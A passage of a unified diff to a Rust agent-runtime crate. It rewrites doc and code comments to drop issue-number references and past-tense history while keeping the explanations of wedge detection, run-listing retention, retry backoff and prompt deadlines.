         let mut world = World::new();

--- a/crates/leviath-runtime/src/fanout/report.rs
+++ b/crates/leviath-runtime/src/fanout/report.rs
@@ -86,11 +86,10 @@ pub(super) fn build_report(
 
 /// Add `text` to the parent's results region, trimming it to fit.
 ///
-/// The write used to be best-effort in the worst sense: `add_entry` rejects an
-/// over-budget entry outright, and the error was discarded, so a report too big
-/// for the region left the merge stage with nothing and said nothing about it.
-/// Trimming first means the merge always receives *something*, and a report that
-/// had to be cut says so where the model will read it.
+/// `add_entry` rejects an over-budget entry outright, so a report too big for
+/// the region would leave the merge stage with nothing at all. Trimming first
+/// means the merge always receives *something*, and a report that had to be cut
+/// says so where the model will read it.
 pub(super) fn inject_results(world: &mut World, parent: Entity, region: &str, text: &str) {
     let Some(mut window) = world.get_mut::<ContextWindow>(parent) else {
         return;

--- a/crates/leviath-runtime/src/fanout/worker_sources.rs
+++ b/crates/leviath-runtime/src/fanout/worker_sources.rs
@@ -2,7 +2,7 @@
 //!
 //! A fan-out worker builds its own `sources_index` and then goes away. Without
 //! this the parent's bibliography describes only the part of the run the parent
-//! did itself, and the report cannot cite anything a worker found (issue #574).
+//! did itself, and the report cannot cite anything a worker found.
 //!
 //! Kept apart from [`super`] because it is a different subject: that module is
 //! how a fan-out is split, run and merged, this one is bibliographies and
@@ -87,10 +87,9 @@ pub(super) fn merge_worker_sources(
         .unwrap_or(0);
 
     // As many of them as there is room for, rather than all or nothing.
-    // `add_to_region` refuses an entry that does not fit, whole, and the refusal
-    // used to be discarded - so a worker arriving at a nearly full region lost
-    // every source it found. Measured on a 7-worker run: four bibliographies
-    // landed, three vanished, and the run reported success.
+    // `add_to_region` refuses an entry that does not fit, whole, so offering the
+    // batch as one entry costs a worker arriving at a nearly full region every
+    // source it found.
     let mut taking = Vec::with_capacity(fresh.len());
     let mut used = 0usize;
     for line in &fresh {

--- a/crates/leviath-runtime/src/host/emit.rs
+++ b/crates/leviath-runtime/src/host/emit.rs
@@ -269,8 +269,8 @@ impl WorldHost {
             self.world.world_mut().despawn(entity);
             self.by_run_id.remove(&run_id);
             self.emitted.remove(&run_id);
-            // The run leaves memory but not the listing: for a while yet it can
-            // still say how it ended, which is the whole of issue #205.
+            // The run leaves memory but not the listing: for a while yet it
+            // can still say how it ended.
             self.record_finished(entry, now);
         }
         // Park paused runs: same teardown as a reap (the reap hook drops the

--- a/crates/leviath-runtime/src/host/health.rs
+++ b/crates/leviath-runtime/src/host/health.rs
@@ -15,8 +15,8 @@ impl WorldHost {
     /// capacity with work queued behind it and no run observably moved. Both
     /// halves matter. Pressure on its own is just a busy daemon. Stillness on its
     /// own is an idle one, or one agent in a long inference with nobody waiting.
-    /// Together they are the shape issue #191 reported: work to do, no capacity to
-    /// do it with, and no sign of that ever changing.
+    /// Together they are the wedge: work to do, no capacity to do it with, and
+    /// no sign of that ever changing.
     pub(super) fn observe_redrive(&mut self) {
         let snapshot = self.world.lane_snapshot();
         let progress = self.progress_fingerprint();
@@ -38,7 +38,7 @@ impl WorldHost {
     /// back at its configured width.
     ///
     /// The guards are what keep this on the safe side of the wedge detection
-    /// that granted the relief in the first place (issue #191): nothing is
+    /// that granted the relief in the first place: nothing is
     /// reclaimed while `dead_cycles` is non-zero (a wedge may be forming),
     /// nothing is reclaimed while the extra capacity is in use (`narrow` only
     /// takes *idle* permits), and the width can never drop below what the
@@ -73,9 +73,9 @@ impl WorldHost {
     /// Deliberately additive. The tempting reading of "force-reclaim stuck
     /// slots" is to kill whatever is holding them, and that is the wrong move
     /// here: a run parked on an `ask_user` is doing exactly what it should, and
-    /// an operator who mistook `waiting` for `stuck` and started killing healthy
-    /// runs is the story behind issue #184. Handing out more capacity unwedges a
-    /// jammed lane without having to be right about which run deserves to die.
+    /// an operator who mistakes `waiting` for `stuck` and starts killing healthy
+    /// runs only makes it worse. Handing out more capacity unwedges a jammed
+    /// lane without having to be right about which run deserves to die.
     ///
     /// Only the tool lane is widened. A full inference pool is a deliberate cap
     /// on requests in flight to a provider, and forcing extra ones past it would
@@ -142,7 +142,7 @@ impl WorldHost {
             });
         // Sampled on the same tick, and unconditionally: a collector needs the
         // empty sample to see that a provider came *back*, not just that it
-        // went away (issue #201).
+        // went away.
         let down: Vec<leviath_core::telemetry::ProviderHealth> = self
             .world
             .open_circuits()
@@ -209,7 +209,7 @@ impl WorldHost {
     /// The daemon otherwise logs nothing per tick, by design - observation goes
     /// through the telemetry sink. But a wedged daemon emits no telemetry either,
     /// precisely because nothing is happening, so "frozen for hours" left no
-    /// trace at all (issue #189). This is the one periodic line that can answer
+    /// trace at all. This is the one periodic line that can answer
     /// "is anything running, and what is it queued behind?".
     ///
     /// Quiet by default: `warn` once the daemon has been going nowhere, `info`

--- a/crates/leviath-runtime/src/host/listing.rs
+++ b/crates/leviath-runtime/src/host/listing.rs
@@ -2,12 +2,12 @@
 //! world rather than re-read from disk.
 //!
 //! [`wait_reason`](WorldHost::wait_reason) is the interesting part. A status of
-//! `Waiting` says nothing about whether a person is needed, which is what issue
-//! #184 was about, so the row carries why.
+//! `Waiting` says nothing about whether a person is needed, so the row carries
+//! why.
 //!
 //! Retention lives here too, and deliberately: a finished run stays listable for
 //! a while after it ends, so how long the list keeps one is a property of the
-//! list rather than of the health bookkeeping it used to sit beside.
+//! list rather than of the health bookkeeping next door.
 
 use super::*;
 
@@ -176,8 +176,7 @@ impl WorldHost {
     }
 
     /// How long a run stays in the listing after the daemon unloads it. `0`
-    /// keeps none, which is how the listing behaved before issue #205. Served
-    /// from `[limits] finished_retention_secs`.
+    /// keeps none. Served from `[limits] finished_retention_secs`.
     pub fn set_finished_retention_secs(&mut self, secs: u64) {
         self.settings.set_finished_retention_secs(secs);
     }

--- a/crates/leviath-runtime/src/host/mod.rs
+++ b/crates/leviath-runtime/src/host/mod.rs
@@ -99,8 +99,8 @@ const HEALTHY_CYCLES_BEFORE_DECAY: u32 = 4;
 /// How often the serve loop re-drives the world on its own.
 ///
 /// The loop is event-driven, so a missed wake anywhere parks it indefinitely -
-/// the daemon looks alive while nothing progresses, which is what issue #189
-/// reported as hours of frozen agents. This bounds any such wedge to one
+/// the daemon looks alive while nothing progresses, which reads from outside as
+/// hours of frozen agents. This bounds any such wedge to one
 /// interval instead of "until something unrelated happens", and gives the lane
 /// heartbeat a place to run.
 ///
@@ -119,12 +119,11 @@ pub const DEFAULT_DEAD_CYCLES_BEFORE_RELIEF: u32 = 10;
 
 /// How long a run stays in the listing after the daemon unloads it.
 ///
-/// A terminal agent is unloaded a pass or two after it finishes, and until now
-/// it vanished from the listing at that moment. A run that died on its first
-/// inference was therefore indistinguishable from one that had never been
-/// spawned, which is what left the scheduler in issue #205 with nothing to go on
-/// but a stopwatch: it could not tell a dead spawn from a slow one, so it
-/// reverted the work and spawned again, for forty minutes.
+/// A terminal agent is unloaded a pass or two after it finishes. With no
+/// retention window it leaves the listing at that moment, and a run that died on
+/// its first inference is then indistinguishable from one that was never
+/// spawned: an external scheduler has nothing to go on but a stopwatch, cannot
+/// tell a dead spawn from a slow one, and reverts the work and spawns again.
 ///
 /// Five minutes covers several polls of any scheduler that checks in about once
 /// a minute, so a single missed or slow poll does not lose the evidence. It is
@@ -133,8 +132,7 @@ pub const DEFAULT_DEAD_CYCLES_BEFORE_RELIEF: u32 = 10;
 /// [`DEFAULT_DEAD_CYCLES_BEFORE_RELIEF`] at the 30-second re-drive works out to
 /// the same five minutes.
 ///
-/// Served from `[limits] finished_retention_secs`; `0` keeps nothing and
-/// restores the old behaviour.
+/// Served from `[limits] finished_retention_secs`; `0` keeps nothing.
 pub const DEFAULT_FINISHED_RETENTION_SECS: u64 = 300;
 
 /// How many unloaded runs [`WorldHost::finished`] holds before the oldest are
@@ -293,9 +291,9 @@ impl WorldHost {
             // An outstanding provider call is a live, unpersisted continuation
             // just like a blocked `ask`: parking despawns the entity, and the
             // response then lands on a dead one and is dropped on the collect
-            // system's stale path. So pausing a run mid-inference used to throw
-            // the call away silently - the run came back from its page-in as
-            // `ReadyToInfer` and paid for the same turn twice.
+            // system's stale path. So pausing a run mid-inference without this
+            // check throws the call away silently: the run comes back from its
+            // page-in as `ReadyToInfer` and pays for the same turn twice.
             //
             // `InFlightWork` covers the call still being out; `HeldInference`
             // covers it having landed and being kept for the resume to apply.
@@ -462,7 +460,7 @@ impl WorldHost {
                 // A failed spawn must leave a trace daemon-side: the error goes
                 // back over the socket to a client that may have already exited,
                 // and nothing is written to disk, so without this log line the
-                // failure is invisible (issue #107).
+                // failure is invisible.
                 if let Err(error) = &result {
                     tracing::error!(
                         run_id = %args.run_id,
@@ -564,9 +562,9 @@ impl WorldHost {
                 // Answering a prompt is one of the points a run resumes at: the
                 // person who just said "no, and here is why" may equally have
                 // gone and changed the permission the prompt was about, and
-                // this is where that reaches the run (issue #728 makes an
-                // unanswered prompt wait for ever, so a run stuck behind one
-                // has no other way out but a cancel).
+                // this is where that reaches the run (an unanswered prompt
+                // waits for ever, so a run stuck behind one has no other way
+                // out but a cancel).
                 let agent = self.interactions.answer_for(response);
                 if let Some(entity) = agent.as_deref().and_then(|id| self.live_entity(id)) {
                     self.on_resumed(entity.entity());

--- a/crates/leviath-runtime/src/host/settings.rs
+++ b/crates/leviath-runtime/src/host/settings.rs
@@ -3,14 +3,13 @@
 //! Three of the numbers [`WorldHost`] runs on come from `config.toml` and are
 //! not world resources: how many dead cycles buy the tool lane some relief, how
 //! long a finished run stays in the listing, and the spend figures worth an
-//! event. They used to be plain fields, which meant the only way to change one
-//! was to restart the daemon - the host is reachable from its own serve loop
-//! and nowhere else, while a config reload happens on the spawn path, which is
-//! handed the world and not the host.
+//! event. Plain fields on the host cannot carry them: the host is reachable
+//! from its own serve loop and nowhere else, while a config reload happens on
+//! the spawn path, which is handed the world and not the host.
 //!
-//! Putting them behind a shared handle is what closes that gap. The host reads
-//! through it, a clone of it goes to whatever watches `config.toml`, and a
-//! change lands without either side having to reach the other.
+//! The shared handle bridges the two. The host reads through it, a clone goes
+//! to whatever watches `config.toml`, and a change lands without either side
+//! having to reach the other.
 
 use std::sync::atomic::{AtomicU32, AtomicU64, Ordering};
 use std::sync::{Arc, Mutex};

--- a/crates/leviath-runtime/src/host/types.rs
+++ b/crates/leviath-runtime/src/host/types.rs
@@ -136,11 +136,10 @@ impl std::fmt::Debug for SpawnArgs {
 /// `control-socket` feature while this type does not, and an intra-doc link
 /// into a module that may not be compiled fails the docs build.
 ///
-/// `lev ps` used to be a run id and a status word, which is why issue #184
-/// happened: `waiting` on its own says nothing about whether a person is needed,
-/// and there was no way to tell a run that had moved a second ago from one that
-/// had been stopped for an hour. Everything here is read straight off the live
-/// world, so it is the daemon's own view, not a re-read of `meta.json`.
+/// A run id and a status word are not enough: `waiting` on its own says nothing
+/// about whether a person is needed, and gives no way to tell a run that moved a
+/// second ago from one stopped for an hour. Everything here is read straight off
+/// the live world, so it is the daemon's own view, not a re-read of `meta.json`.
 #[derive(Debug, Clone, Serialize, Deserialize, PartialEq)]
 pub struct RunListEntry {
     /// The run id (`lev ps`'s first column, and what `lev kill` takes).
@@ -199,11 +198,10 @@ pub struct RunListEntry {
     /// Whether this run finished having modified nothing, when its blueprint
     /// gave it a way to. Only ever true for a run that has stopped.
     ///
-    /// The flag itself is as old as issue #107, but nothing ever showed it: it
-    /// went into `meta.json` and was read back only on restart, so a run that
-    /// finished with no work to show for it looked exactly like one that
-    /// succeeded. Defaulted for the same reason as `unattended` - an older
-    /// daemon simply omits it.
+    /// Carried on the row rather than left in `meta.json`, which is read back
+    /// only on restart: a run that finished with no work to show for it
+    /// otherwise looks exactly like one that succeeded. Defaulted for the same
+    /// reason as `unattended` - an older daemon simply omits it.
     #[serde(default)]
     pub empty_output: bool,
     /// Fan-outs this run degraded: a `fan_out` stage that transitioned without
@@ -256,9 +254,9 @@ pub struct RunListing {
 /// The daemon's own health, alongside the run listing.
 ///
 /// A per-run view answers "what is this run doing"; this answers "is the daemon
-/// getting anywhere at all". They are different questions, and issue #191 was
-/// only visible in the second: every individual run looked fine, and the factory
-/// as a whole had not moved in hours.
+/// getting anywhere at all". They are different questions, and a wedge is only
+/// visible in the second: every individual run looks fine while the daemon as a
+/// whole has not moved in hours.
 #[derive(Debug, Clone, Default, Serialize, Deserialize, PartialEq)]
 pub struct DaemonHealth {
     /// Loaded agents by status.
@@ -289,7 +287,7 @@ pub struct DaemonHealth {
     /// Providers currently out of service, and when each is probed again.
     ///
     /// Empty on a healthy daemon. `#[serde(default)]` so an older client still
-    /// parses a newer daemon's response (issue #201).
+    /// parses a newer daemon's response.
     #[serde(default)]
     pub providers_down: Vec<crate::pipeline::ProviderCircuitState>,
 }
@@ -414,11 +412,9 @@ pub enum SubAgentOp {
 /// What a parent learns when it checks on a child: what the child is doing, and
 /// what it has handed back.
 ///
-/// The two used to be one thing - the status alone - which is why
-/// `wait_for_agent`, whose schema has always promised "return its final result",
-/// returned `"Sub-agent 'x' finished with status: Complete"` and nothing else. A
-/// parent had no way to receive a child's work except by agreeing on a file path
-/// out of band.
+/// Both halves, not the status alone. `wait_for_agent`'s schema promises to
+/// return the child's final result, and a status word leaves a parent no way to
+/// receive a child's work except by agreeing on a file path out of band.
 #[derive(Debug, Clone, PartialEq)]
 pub struct SubAgentReport {
     /// What the child is doing now.

--- a/crates/leviath-runtime/src/host_tests.rs
+++ b/crates/leviath-runtime/src/host_tests.rs
@@ -365,7 +365,7 @@ fn is_inferring(host: &mut WorldHost, entity: Entity) -> bool {
         .is_some()
 }
 
-/// Regression for #189 ("slots=0 for hours, in_progress frozen").
+/// Regression: slots at zero for hours with `in_progress` frozen.
 ///
 /// Releasing an inference permit has to wake the tick loop, because
 /// `dispatch_inference` leaves a slot-starved agent `ReadyToInfer` to be
@@ -524,8 +524,7 @@ fn tool_call(id: &str) -> InferenceResponse {
     }
 }
 
-/// Regression for #197 ("entering the next stage waits for the re-drive
-/// tick").
+/// Regression: entering the next stage waits for the re-drive tick.
 ///
 /// `serve` is event-driven; its 30s re-drive is a correctness backstop for a
 /// wake that never came, not the mechanism ordinary work runs on. A stage
@@ -590,7 +589,7 @@ fn host_with_capped_provider(limit: usize) -> WorldHost {
 
 /// A run parked on a full provider pool sees every model pool with room in it,
 /// so the heartbeat has to name the provider's own number or the line reads as
-/// "waiting on nothing" (issue #522).
+/// "waiting on nothing".
 #[tokio::test]
 async fn the_heartbeat_names_a_full_provider_pool() {
     leviath_testkit::with_tracing(|| async {
@@ -644,9 +643,9 @@ async fn the_lane_heartbeat_distinguishes_pressure_from_idle() {
     .await;
 }
 
-/// A daemon with work queued and nothing moving is what issue #191 reported,
-/// and until now it looked identical to a busy one. Each re-drive that finds
-/// the lanes full and the world unchanged is one dead cycle.
+/// A daemon with work queued and nothing moving is the wedge, and from outside
+/// it looks identical to a busy one. Each re-drive that finds the lanes full
+/// and the world unchanged is one dead cycle.
 #[tokio::test]
 async fn re_drives_that_go_nowhere_under_pressure_count_as_dead_cycles() {
     leviath_testkit::with_tracing(|| async {
@@ -829,7 +828,7 @@ async fn the_hosts_limits_settings_are_shared_with_whoever_holds_them() {
 /// Additive on purpose. Killing whatever holds the lane is the tempting
 /// reading of "reclaim stuck slots", and it is wrong: a run parked on an
 /// `ask_user` is behaving correctly, and an operator killing healthy
-/// `waiting` runs is the story behind issue #184.
+/// `waiting` runs only makes it worse.
 #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
 async fn a_lane_that_never_drains_is_widened_rather_than_emptied() {
     leviath_testkit::with_tracing(|| async {
@@ -858,9 +857,9 @@ async fn a_lane_that_never_drains_is_widened_rather_than_emptied() {
 }
 
 /// The give-back half: once the jam is over and the lane has been healthy
-/// for the decay margin, the granted capacity is reclaimed - a historical
-/// wedge no longer raises the daemon's concurrency ceiling (and with it,
-/// its peak memory) for the rest of its life.
+/// for the decay margin, the granted capacity is reclaimed, so one wedge does
+/// not raise the daemon's concurrency ceiling (and with it, its peak memory)
+/// for the rest of its life.
 #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
 async fn relief_decays_back_once_the_lane_is_healthy_again() {
     leviath_testkit::with_tracing(|| async {
@@ -997,7 +996,7 @@ async fn each_re_drive_reports_lane_health_to_the_telemetry_sink() {
 
 /// The same tick reports which providers are out of service, and reports
 /// the empty case too: a collector needs that to see a provider come back,
-/// not merely stop being mentioned (issue #201).
+/// not merely stop being mentioned.
 #[tokio::test]
 async fn each_re_drive_reports_providers_out_of_service() {
     let sink = Arc::new(leviath_core::telemetry::MemorySink::default());
@@ -2742,8 +2741,8 @@ async fn a_completed_event_without_an_answer_carries_none() {
 
 /// A run announces each spend threshold once, as it passes it.
 ///
-/// The run that motivated this spent $274 while looking, from outside, exactly
-/// like one making ordinary progress (#573).
+/// The motivating case: a run spent $274 while looking, from outside, exactly
+/// like one making ordinary progress.
 #[tokio::test]
 async fn a_run_announces_each_spend_threshold_once_as_it_passes_it() {
     let mut host = host_with(vec![text("done")]);
@@ -2934,9 +2933,9 @@ async fn emit_events_broadcasts_agent_changes() {
 }
 
 /// A run is created untitled and named a moment later, once the titling call
-/// lands. Nothing on the wire used to say so, so a subscriber showed the
-/// prompt's first line until an unrelated re-read replaced it. Both halves are
-/// asserted here: the `Renamed` frame that announces the moment, and the title
+/// lands. Nothing else on the wire says so, so without this a subscriber shows
+/// the prompt's first line until an unrelated re-read replaces it. Both halves
+/// are asserted here: the `Renamed` frame that announces the moment, and the
 /// riding the status frames that follow, which is what a subscriber that joined
 /// after the moment reads instead of fetching the run.
 #[tokio::test]
@@ -3327,12 +3326,11 @@ fn unload_with(host: &mut WorldHost, run_id: &str, status: AgentStatus) {
     host.emit_events();
 }
 
-/// The failure behind issue #205: a run that died on its first inference was
-/// unloaded a pass later and vanished, so a scheduler polling the listing
-/// could not tell it from a run that had never been spawned. It now keeps
-/// its place, and keeps the whole error rather than the status word - which
-/// is the reason the row is built from the world and not from `Emitted`,
-/// whose `status` is a `&'static str`.
+/// A run that died on its first inference is unloaded a pass later, and with no
+/// retention it vanishes, leaving a scheduler polling the listing unable to tell
+/// it from a run that was never spawned. It keeps its place, and keeps the whole
+/// error rather than the status word, which is why the row is built from the
+/// world and not from `Emitted`, whose `status` is a `&'static str`.
 #[tokio::test]
 async fn an_unloaded_run_stays_in_the_listing_with_the_reason_it_ended() {
     let mut host = host_with(vec![]);
@@ -3368,7 +3366,7 @@ async fn an_unloaded_run_leaves_the_listing_once_it_is_stale() {
     assert!(host.finished().is_empty());
 }
 
-/// `0` is how an operator asks for the old behaviour back.
+/// `0` is how an operator asks for no retention at all.
 #[tokio::test]
 async fn a_zero_window_keeps_nothing() {
     let mut host = host_with(vec![]);
@@ -3524,8 +3522,8 @@ async fn emit_events_never_unloads_waiting_agents() {
 /// failed while the run was already going again, and the obvious next move on
 /// being told that is to start the work over.
 ///
-/// Caught live, not here: the unit tests for #576 passed while `lev resume`
-/// still exited 1.
+/// Caught live, not here: the per-agent unit tests pass while `lev resume`
+/// exits 1.
 #[tokio::test]
 async fn resuming_a_run_that_had_to_be_loaded_reports_success() {
     let mut host = host_with(vec![]);
@@ -4152,7 +4150,7 @@ async fn list_reports_blueprint_shape_and_unattended() {
 }
 
 /// A run that stopped having produced nothing says so in the listing -
-/// otherwise it is indistinguishable from one that did the work (#192).
+/// otherwise it is indistinguishable from one that did the work.
 #[tokio::test]
 async fn list_reports_a_finished_run_that_produced_nothing() {
     let mut host = host_with(vec![]);

--- a/crates/leviath-runtime/src/inference_bridge.rs
+++ b/crates/leviath-runtime/src/inference_bridge.rs
@@ -38,9 +38,9 @@ pub const DEFAULT_RETRY_BASE_DELAY_MS: u64 = 1_000;
 /// the provider gave no `Retry-After` for, in seconds.
 ///
 /// Deliberately much larger than [`DEFAULT_RETRY_BASE_DELAY_MS`]. An overload
-/// window lasts minutes, so a second of waiting only buys another refusal: the
-/// reported run (issue #417) spent all three of its retries inside one 529
-/// window and was failed with 44 iterations of finished work in hand.
+/// window lasts minutes, so a second of waiting only buys another refusal: a
+/// run can otherwise spend all three of its retries inside one 529 window and
+/// be failed with dozens of iterations of finished work in hand.
 pub const CAPACITY_BASE_DELAY_SECS: u64 = 15;
 
 /// The longest one capacity backoff may last, in seconds, and the ceiling on a
@@ -308,7 +308,7 @@ pub(crate) fn backoff_after(
         // The provider said when to come back, so come back then.
         (true, Some(secs)) => Duration::from_secs(secs).min(policy.capacity_max_delay),
         // At capacity with no hint: the slow schedule, since the window this
-        // failure describes outlasts a blip-sized wait (issue #417).
+        // failure describes outlasts a blip-sized wait.
         (true, None) => {
             exponential(policy.capacity_base_delay, attempt).min(policy.capacity_max_delay)
         }
@@ -381,8 +381,8 @@ pub(crate) async fn run_inference_job(
     // never-completing (stalled-stream) call cannot hold the pool slot forever.
     //
     // `infer` borrows the request, so every attempt reuses the one assembled
-    // copy. It used to be cloned per attempt, which doubled the live footprint
-    // of every in-flight request for the whole (possibly minutes-long) call.
+    // copy. Cloning it per attempt doubles the live footprint of every
+    // in-flight request for the whole (possibly minutes-long) call.
     let attempts = async {
         // The pre-flight guard, inside the cancel and the job timeout with the
         // call it protects: a count that hangs is bounded by the same deadline
@@ -429,7 +429,7 @@ pub(crate) async fn run_inference_job(
     // Note this arm sends no outcome and so never reaches the `wake` below: the
     // tick loop learns the slot is free from the permit's own `Drop` (see
     // `InferencePools::with_wake`). Without that, this return frees a slot in
-    // silence and every agent queued on this model stays parked (issue #189).
+    // silence and every agent queued on this model stays parked.
     let result = tokio::select! {
         biased;
         _ = cancel.cancelled() => {
@@ -439,13 +439,13 @@ pub(crate) async fn run_inference_job(
         outcome = tokio::time::timeout(retry.job_timeout, attempts) => match outcome {
             Ok(result) => result,
             // A timeout, said the same way the provider's own would have said
-            // it. This used to be `ProviderError::Other`, which is neither
-            // transient nor `Unreachable`, so the two ways a call can run out of
-            // time ended in opposite places: a provider-side timeout failed
-            // over and then parked the run for a resume, while sitting out the
-            // whole job deadline - the *worse* of the two - killed it outright
-            // and threw away every stage it had finished. The wall is the same
-            // wall; only which timer noticed differs.
+            // it. `ProviderError::Other` is neither transient nor
+            // `Unreachable`, so labelling it that way sends the two ways a call
+            // can run out of time to opposite places: a provider-side timeout
+            // fails over and then parks the run for a resume, while sitting out
+            // the whole job deadline - the *worse* of the two - kills it
+            // outright and throws away every stage it finished. The wall is the
+            // same wall; only which timer noticed differs.
             Err(_elapsed) => Err(leviath_providers::ProviderError::labelled(
                 leviath_providers::FailureKind::Timeout,
                 "waiting for the provider",
@@ -985,7 +985,7 @@ mod tests {
         Ok(String),
         Transient,
         /// The reported failure: a 529 the provider reports as a plain API
-        /// error, which is a capacity refusal rather than a blip (issue #417).
+        /// error, which is a capacity refusal rather than a blip.
         Overloaded,
         Permanent,
         /// Never returns - a stalled/hung call, for the job-timeout test.

--- a/crates/leviath-runtime/src/inference_pool.rs
+++ b/crates/leviath-runtime/src/inference_pool.rs
@@ -220,8 +220,7 @@ impl InferencePools {
     /// slot-starved agent `ReadyToInfer` to be retried "on a later tick", and
     /// the loop is event-driven: a later tick only happens when something wakes
     /// it. So every path that frees a permit owes the loop a wake, or the freed
-    /// slot is invisible and everything queued behind it stays parked (issue
-    /// #189).
+    /// slot is invisible and everything queued behind it stays parked.
     ///
     /// Hanging the wake off the permit's `Drop` rather than off each release
     /// site is the point: the obligation can't be forgotten by a new call site,
@@ -667,8 +666,8 @@ mod tests {
         assert_eq!(cfg.provider_limit_for("anthropic"), None);
     }
 
-    /// The motivating case in issue #522: one provider capped at 1 while every
-    /// other provider keeps the global cap.
+    /// The motivating case: one provider capped at 1 while every other provider
+    /// keeps the global cap.
     #[test]
     fn a_provider_cap_bounds_its_models_together_and_nobody_else() {
         let mut cfg = InferencePoolConfig::new().with_default(Some(8));
@@ -807,7 +806,7 @@ mod tests {
         let _ = expect_permit(sem.acquire_owned().await);
     }
 
-    /// The issue #189 contract, at its narrowest: handing a slot back has to wake
+    /// The contract, at its narrowest: handing a slot back has to wake
     /// the driver. `dispatch_inference` parks a slot-starved agent to be retried
     /// "on a later tick", and the loop is event-driven - so a silent release
     /// leaves the freed capacity invisible.

--- a/crates/leviath-runtime/src/interaction_hub.rs
+++ b/crates/leviath-runtime/src/interaction_hub.rs
@@ -17,7 +17,7 @@
 //! person answers it or the run is cancelled, however long that takes. An
 //! operator who wants an unattended run to release its slot instead sets
 //! `[limits] interaction_timeout_secs`, and [`InteractionHub::set_timeout_secs`]
-//! puts that deadline on the wait (issue #204).
+//! puts that deadline on the wait.
 
 use std::collections::HashMap;
 use std::sync::atomic::{AtomicU64, Ordering};
@@ -132,8 +132,8 @@ impl InteractionHub {
         // The lock is released before awaiting; answer()/cancel() can run.
         //
         // Off the tool lane, because there is no bound on how long a person
-        // takes: a batch that held lane capacity through a prompt was capacity
-        // no other agent's tools could use (issue #191). Callers that are not
+        // takes: a batch that holds lane capacity through a prompt is capacity
+        // no other agent's tools can use. Callers that are not
         // tool batches - the gate-prompt and interaction-point lanes - have no
         // ticket, and for them this is a plain await.
         let Some(deadline) = self.timeout() else {

--- a/crates/leviath-runtime/src/interaction_hub_tests.rs
+++ b/crates/leviath-runtime/src/interaction_hub_tests.rs
@@ -29,7 +29,7 @@ fn a_poisoned_registry_still_serves_every_other_agent() {
     // `pending` holds *every* agent's open prompt, so a panic while holding
     // it must not poison it: a poisoned registry makes
     // `pending()`/`answer()`/`cancel()` panic for all agents and the
-    // dashboard (issue #109).
+    // dashboard.
     let hub = InteractionHub::new();
     let prev = std::panic::take_hook();
     std::panic::set_hook(Box::new(|_| {})); // silence the deliberate panic
@@ -69,8 +69,8 @@ async fn ask_is_answered_through_the_hub() {
 ///
 /// The answer can arrive from another agent's tool call, and on a lane with
 /// no room left that call is queued behind the batch that is waiting for it.
-/// That is the shape that froze whole factories in issue #191: everything
-/// looked `waiting`, nothing was failed, and nothing ever moved again.
+/// That is the shape that freezes a whole daemon: everything looks `waiting`,
+/// nothing is failed, and nothing moves again.
 #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
 async fn a_batch_waiting_on_a_prompt_does_not_hold_the_tool_lane() {
     use crate::tool_bridge::{ToolJob, ToolLane, ToolLaneStats};
@@ -220,9 +220,9 @@ async fn cancel_wakes_submit_with_neutral_response() {
 
 #[tokio::test(start_paused = true)]
 async fn a_prompt_nobody_answers_is_released_when_the_deadline_passes() {
-    // The zombie in issue #204: six runs sat in `WaitingInput` for hours
-    // because nothing ever aged the request out. Now the hub resolves it
-    // itself and the agent goes back to work.
+    // With no deadline, a prompt nobody answers keeps its run in `WaitingInput`
+    // for ever. With one, the hub resolves the request itself and the agent
+    // goes back to work.
     let hub = InteractionHub::new();
     hub.set_timeout_secs(Some(60));
     let backend = hub.backend_for("agent-a");
@@ -264,9 +264,8 @@ async fn a_deadline_changes_nothing_for_a_prompt_that_is_answered() {
 }
 
 /// With no deadline set, a prompt waits for a person however long that takes.
-/// The clock is paused and advanced well past the hour that used to be the
-/// default, and the prompt is still open; the answer that then arrives is the
-/// one the caller gets.
+/// The clock is paused and advanced a full day, and the prompt is still open;
+/// the answer that then arrives is the one the caller gets.
 #[tokio::test(start_paused = true)]
 async fn with_no_deadline_a_prompt_waits_for_a_person_however_long_it_takes() {
     let hub = InteractionHub::new();
@@ -304,8 +303,8 @@ async fn a_zero_deadline_waits_for_a_person_however_long_it_takes() {
     assert_eq!(asking.await.unwrap().value.as_deref(), Some("here I am"));
 }
 
-/// A configured deadline still fires when it says: two seconds means two
-/// seconds, not the hour it used to default to and not for ever.
+/// A configured deadline fires when it says: two seconds means two seconds,
+/// not longer and not for ever.
 #[tokio::test(start_paused = true)]
 async fn a_two_second_deadline_fires_at_two_seconds() {
     let hub = InteractionHub::new();

--- a/crates/leviath-runtime/src/interaction_points.rs
+++ b/crates/leviath-runtime/src/interaction_points.rs
@@ -22,8 +22,7 @@
 //!   point. Directive/edit loops are bounded by [`MAX_REVISION_ROUNDS`].
 //!
 //! The routing is deterministic (code); only the input capture is a user
-//! interaction - faithfully porting the deleted imperative
-//! `run_interactive_points_stage`.
+//! interaction.
 
 use std::collections::HashMap;
 use std::sync::Arc;
@@ -152,7 +151,7 @@ pub(crate) struct InteractionPointStage {
 #[derive(Resource)]
 pub(crate) struct InteractionPointResults(pub UnboundedReceiver<InteractionPointOutcome>);
 
-// ─── Pure routing helpers (ported from the deleted imperative stage loop) ─────
+// ─── Pure routing helpers ─────────────────────────────────────────────────────
 
 /// Normalize an option label for matching: fold Unicode dashes to ASCII `-` and
 /// collapse whitespace, so `"Revise - I'll…"` matches regardless of dash style.
@@ -1210,7 +1209,7 @@ mod tests {
     #[tokio::test]
     async fn dispatch_auto_approves_an_unattended_run_without_asking() {
         // `--yolo` means nobody is watching, so a stage-boundary checkpoint must
-        // resolve itself rather than park the run on the hub forever (#107).
+        // resolve itself rather than park the run on the hub forever.
         let hub = InteractionHub::new();
         let (tx, mut rx) = unbounded_channel();
         let mut world = World::new();
@@ -1959,7 +1958,7 @@ mod tests {
         );
     }
 
-    // ── restore (restart persistence, issue #38) ──
+    // ── restore (restart persistence) ──
 
     #[test]
     fn interaction_point_state_round_trips() {

--- a/crates/leviath-runtime/src/lane_supervisor.rs
+++ b/crates/leviath-runtime/src/lane_supervisor.rs
@@ -9,7 +9,7 @@
 //! silently. If the job panics before its send, no outcome is ever produced -
 //! and the marker it is waiting on is one of the `has_async_inflight` states, so
 //! the driver treats the agent as busy rather than quiescent and it waits for a
-//! completion that can no longer happen (issue #190). The panic guard around the
+//! completion that can no longer happen. The panic guard around the
 //! tick schedule (`world::run_isolated`) does not help here: these panics happen
 //! on a tokio worker, not in a system.
 //!

--- a/crates/leviath-runtime/src/persistence.rs
+++ b/crates/leviath-runtime/src/persistence.rs
